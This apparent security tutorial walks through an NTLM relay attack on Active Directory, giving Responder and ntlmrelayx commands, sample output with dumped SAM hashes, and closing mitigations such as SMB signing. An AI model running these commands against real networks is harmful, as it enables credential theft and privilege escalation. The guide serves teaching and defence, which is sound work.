NTLM Relay Attacks in 2026
0x00 - Executive Summary
Despite modern defenses, NTLM Relay remains a critical threat in 2026. This guide provides a complete, step-by-step walkthrough on how to intercept and relay authentication requests in an Active Directory environment to achieve Remote Code Execution (RCE) or Privilege Escalation.
0x01 - Prerequisites & Tooling
To follow this guide, ensure your lab meets the following requirements:
- Attacker Machine: Kali Linux (Updated).
- Environment: Active Directory Domain with at least one Windows Server/Workstation where SMB Signing is NOT enforced.
- Tools:
- Responder: For LLMNR/mDNS poisoning.
- Impacket (ntlmrelayx): For the core relay engine.
0x02 - The Theory: Why it still works
The core of the issue is that NTLM authentication does not verify the identity of the server. As long as the target does not require SMB Signing, it will accept the relayed session as legitimate.
0x03 - Step-by-Step Execution
Step 1: Network Poisoning
We start by capturing broadcast traffic. Run Responder to listen for LLMNR, NBT-NS, and mDNS requests.
sudo responder -I eth0 -dwvStep 2: Configuring the Relay
In a second terminal, set up ntlmrelayx.py. We will target a specific IP and attempt to dump the local SAM database upon successful relay.
python3 ntlmrelayx.py -t smb://192.168.1.150 -smb2supportStep 3: Triggering the Victim
The attack completes when a victim attempts to access a non-existent network share, forcing their machine to broadcast a request.
0x04 - Proof of Concept (PoC)
Once the relay is successful, the tool automatically executes the secretsdump routine:
[*] SMBD-Relay: Connection from 192.168.1.50 controlled.
[*] Targeting: smb://192.168.1.150
[+] Authenticating as DOMAIN\VictimUser...
[+] Authentication Successful! Dumping local SAM hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Done! Check /tmp/ngr3p_hashes.txt for full logs.0x05 - Offense informs Defense
To mitigate this attack, the most effective measures are:
- Enable SMB Signing: Set 'Require' for both Client and Server communications.
- Disable Legacy Protocols: Turn off LLMNR and NetBIOS over TCP/IP.
- EPA: Enable Extended Protection for Authentication on sensitive services.